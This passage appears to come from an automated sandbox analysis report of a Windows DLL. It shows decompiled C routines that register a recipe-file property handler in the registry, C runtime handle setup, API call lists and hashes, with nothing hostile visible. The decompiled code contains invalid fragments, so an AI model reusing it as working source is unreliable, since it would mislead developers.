				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0x3c5a3040
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t6 =  &_a12; // 0x3c5a3040
				_t41 =  *_t6;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}






















                                              0x10003409
                                              0x10003410
                                              0x10003417
                                              0x1000341b
                                              0x10003425
                                              0x10003425
                                              0x10003428
                                              0x1000343f
                                              0x10003441
                                              0x1000344b
                                              0x10003458
                                              0x10003458
                                              0x00000000
                                              0x1000344d
                                              0x1000344d
                                              0x10003452
                                              0x00000000
                                              0x10003454
                                              0x10003454
                                              0x1000345d
                                              0x1000345f
                                              0x1000345f
                                              0x10003454
                                              0x10003452
                                              0x10003465
                                              0x1000347a
                                              0x1000348a
                                              0x10003490
                                              0x10003494
                                              0x1000349f
                                              0x1000349f
                                              0x100034a1
                                              0x100034a3
                                              0x100034b0
                                              0x100034ba
                                              0x100034c2
                                              0x100034e2
                                              0x100034e8
                                              0x100034c4
                                              0x100034c4
                                              0x100034d4
                                              0x00000000
                                              0x00000000
                                              0x100034d4
                                              0x100034c2
                                              0x100034b0
                                              0x100034a1
                                              0x10003501

                                              APIs
                                              • vswprintf.LIBCMT ref: 10003441
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                              • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                              • StrCmpNICW.SHLWAPI(@0Z<,Software\Classes\%s,00000013), ref: 100034BA
                                              • StrStrIW.SHLWAPI(@0Z<,PropertyHandlers), ref: 100034D0
                                              • StrStrIW.SHLWAPI(@0Z<,KindMap), ref: 100034DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Value__vsnwprintf_llstrlenvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Software\Classes\%s
                                              • API String ID: 1581644826-1279041905
                                              • Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                              • Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
                                              • Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                              • Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10003510, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 83registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 49%
                                              			E10003510(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0x3c5a3040
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t6 =  &_a12; // 0x3c5a3040
				_t39 =  *_t6;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}






















                                              0x10003519
                                              0x10003520
                                              0x10003527
                                              0x1000352b
                                              0x10003535
                                              0x10003535
                                              0x10003538
                                              0x1000354f
                                              0x10003551
                                              0x1000355b
                                              0x10003568
                                              0x10003568
                                              0x00000000
                                              0x1000355d
                                              0x1000355d
                                              0x10003562
                                              0x00000000
                                              0x10003564
                                              0x10003564
                                              0x1000356d
                                              0x1000356f
                                              0x1000356f
                                              0x10003564
                                              0x10003562
                                              0x10003575
                                              0x10003585
                                              0x1000358d
                                              0x10003593
                                              0x10003597
                                              0x100035a2
                                              0x100035a2
                                              0x100035a4
                                              0x100035a6
                                              0x100035b3
                                              0x100035bd
                                              0x100035c5
                                              0x100035e5
                                              0x100035eb
                                              0x100035c7
                                              0x100035c7
                                              0x100035d7
                                              0x00000000
                                              0x00000000
                                              0x100035d7
                                              0x100035c5
                                              0x100035b3
                                              0x100035a4
                                              0x10003604

                                              APIs
                                              • vswprintf.LIBCMT ref: 10003551
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                              • StrCmpNICW.SHLWAPI(@0Z<,Software\Classes\%s,00000013), ref: 100035BD
                                              • StrStrIW.SHLWAPI(@0Z<,PropertyHandlers), ref: 100035D3
                                              • StrStrIW.SHLWAPI(@0Z<,KindMap), ref: 100035DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Value__vsnwprintf_lvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
                                              • API String ID: 396321892-3656019630
                                              • Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                              • Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
                                              • Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                              • Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}




























                                              0x10007719
                                              0x1000771b
                                              0x10007720
                                              0x10007727
                                              0x1000772d
                                              0x1000772f
                                              0x10007738
                                              0x10007758
                                              0x1000775c
                                              0x1000775d
                                              0x1000775e
                                              0x10007765
                                              0x10007767
                                              0x1000776c
                                              0x10007785
                                              0x1000778a
                                              0x10007790
                                              0x10007799
                                              0x1000779f
                                              0x100077a2
                                              0x100077a5
                                              0x100077ae
                                              0x100077b1
                                              0x100077b7
                                              0x100077ba
                                              0x100077bd
                                              0x100077c0
                                              0x100077c3
                                              0x100077c3
                                              0x100077ce
                                              0x100077d9
                                              0x10007908
                                              0x10007908
                                              0x10007908
                                              0x1000790e
                                              0x00000000
                                              0x00000000
                                              0x10007919
                                              0x1000791f
                                              0x10007925
                                              0x1000793a
                                              0x10007940
                                              0x10007947
                                              0x1000794c
                                              0x1000794e
                                              0x10007942
                                              0x10007944
                                              0x10007944
                                              0x10007958
                                              0x1000795d
                                              0x100079a4
                                              0x100079aa
                                              0x100079ad
                                              0x100079b3
                                              0x100079ba
                                              0x100079bf
                                              0x100079bf
                                              0x00000000
                                              0x10007963
                                              0x10007964
                                              0x1000796c
                                              0x00000000
                                              0x00000000
                                              0x1000796e
                                              0x10007970
                                              0x10007978
                                              0x10007985
                                              0x10007990
                                              0x10007995
                                              0x10007999
                                              0x1000799f
                                              0x00000000
                                              0x1000799f
                                              0x1000798b
                                              0x1000798d
                                              0x1000798d
                                              0x00000000
                                              0x1000798d
                                              0x1000797e
                                              0x00000000
                                              0x1000797e
                                              0x1000792c
                                              0x10007932
                                              0x100079c6
                                              0x100079c6
                                              0x00000000
                                              0x100079c6
                                              0x10007925
                                              0x100079cc
                                              0x100079d3
                                              0x1000774d
                                              0x1000774f
                                              0x10007750
                                              0x10007755
                                              0x10007755
                                              0x100077df
                                              0x100077e4
                                              0x00000000
                                              0x00000000
                                              0x100077ea
                                              0x100077ec
                                              0x100077ef
                                              0x100077f2
                                              0x100077f7
                                              0x10007801
                                              0x10007803
                                              0x10007805
                                              0x10007805
                                              0x1000780a
                                              0x1000780b
                                              0x1000780e
                                              0x10007820
                                              0x10007822
                                              0x10007827
                                              0x100078bb
                                              0x100078c2
                                              0x100078c8
                                              0x100078d8
                                              0x100078de
                                              0x100078e1
                                              0x100078e4
                                              0x100078e8
                                              0x100078ee
                                              0x100078f1
                                              0x100078f4
                                              0x100078f7
                                              0x100078f7
                                              0x100078fc
                                              0x100078fd
                                              0x10007900
                                              0x00000000
                                              0x10007900
                                              0x1000782d
                                              0x10007833
                                              0x00000000
                                              0x10007833
                                              0x10007836
                                              0x10007838
                                              0x1000783b
                                              0x1000783e
                                              0x10007841
                                              0x10007849
                                              0x1000784e
                                              0x100078a8
                                              0x100078a8
                                              0x100078a9
                                              0x100078af
                                              0x100078b0
                                              0x100078b3
                                              0x100078b6
                                              0x00000000
                                              0x10007855
                                              0x10007855
                                              0x10007859
                                              0x00000000
                                              0x00000000
                                              0x1000785d
                                              0x1000786d
                                              0x1000787a
                                              0x10007881
                                              0x10007886
                                              0x1000788d
                                              0x10007895
                                              0x10007899
                                              0x1000789f
                                              0x100078a2
                                              0x100078a5
                                              0x100078a5
                                              0x00000000
                                              0x100078a5
                                              0x10007860
                                              0x10007866
                                              0x1000786b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000786b
                                              0x1000784e
                                              0x00000000
                                              0x10007841
                                              0x10007779
                                              0x10007781
                                              0x00000000
                                              0x10007781
                                              0x10007745
                                              0x00000000

                                              APIs
                                              • __lock.LIBCMT ref: 10007727
                                                • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                                • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                                • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                              • __calloc_crt.LIBCMT ref: 1000775E
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
                                              • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                              • __calloc_crt.LIBCMT ref: 10007819
                                              • GetFileType.KERNEL32 ref: 10007860
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                              • GetFileType.KERNEL32 ref: 10007964
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 301580142-0
                                              • Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                              • Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
                                              • Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                              • Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10003310, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 76registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 49%
                                              			E10003310(char _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0x3c5a3040
				_v8 = _t16 ^ _t40;
				_t2 =  &_a4; // 0x3c5a3040
				_t35 = _a8;
				_v1036 =  *_t2;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}





















                                              0x10003319
                                              0x10003320
                                              0x10003323
                                              0x10003328
                                              0x1000332b
                                              0x10003344
                                              0x10003346
                                              0x10003350
                                              0x1000335d
                                              0x1000335d
                                              0x10003362
                                              0x10003364
                                              0x10003368
                                              0x1000336a
                                              0x1000336c
                                              0x10003374
                                              0x1000337a
                                              0x1000337e
                                              0x10003383
                                              0x10003383
                                              0x1000337e
                                              0x10003389
                                              0x1000338e
                                              0x10003390
                                              0x1000339d
                                              0x100033a7
                                              0x100033af
                                              0x100033d7
                                              0x100033d7
                                              0x100033af
                                              0x1000339d
                                              0x100033e9
                                              0x100033ed
                                              0x100033fa
                                              0x100033fa
                                              0x10003352
                                              0x10003357
                                              0x00000000
                                              0x00000000
                                              0x10003359
                                              0x00000000
                                              0x1000335b
                                              0x00000000
                                              0x1000335b

                                              APIs
                                              • vswprintf.LIBCMT ref: 10003346
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                              • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                              • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                              • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: DeleteTree__vsnwprintf_lvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Software\Classes\%s
                                              • API String ID: 1945471109-1279041905
                                              • Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                              • Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
                                              • Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                              • Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                              0x1000cb56
                                              0x1000cb5d
                                              0x1000cb66
                                              0x1000cb73
                                              0x1000cbc5
                                              0x1000cbc5
                                              0x1000cb75
                                              0x1000cb75
                                              0x1000cb7d
                                              0x1000cb8b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000cb93
                                              0x1000cb93
                                              0x1000cb95
                                              0x1000cba7
                                              0x00000000
                                              0x1000cba9
                                              0x1000cba9
                                              0x1000cbb9
                                              0x00000000
                                              0x1000cbbb
                                              0x1000cbc1
                                              0x1000cbc1
                                              0x1000cbb9
                                              0x1000cba7
                                              0x1000cb7d
                                              0x1000cbc8
                                              0x1000cbe0
                                              0x1000cbe7
                                              0x1000cbf5
                                              0x1000cbe9
                                              0x1000cbf0
                                              0x1000cbf0
                                              0x1000cbfa
                                              0x1000cb5f
                                              0x1000cb63
                                              0x1000cb63

                                              APIs
                                              • __ioinit.LIBCMT ref: 1000CB56
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              • __get_osfhandle.LIBCMT ref: 1000CB6A
                                              • __get_osfhandle.LIBCMT ref: 1000CB95
                                              • __get_osfhandle.LIBCMT ref: 1000CB9E
                                              • __get_osfhandle.LIBCMT ref: 1000CBAA
                                              • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                              • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                              • __free_osfhnd.LIBCMT ref: 1000CBC8
                                              • __dosmaperr.LIBCMT ref: 1000CBEA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                              • String ID:
                                              • API String ID: 974577687-0
                                              • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                              • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                              • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                              • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                              • VariantClear.OLEAUT32(?), ref: 10002B69
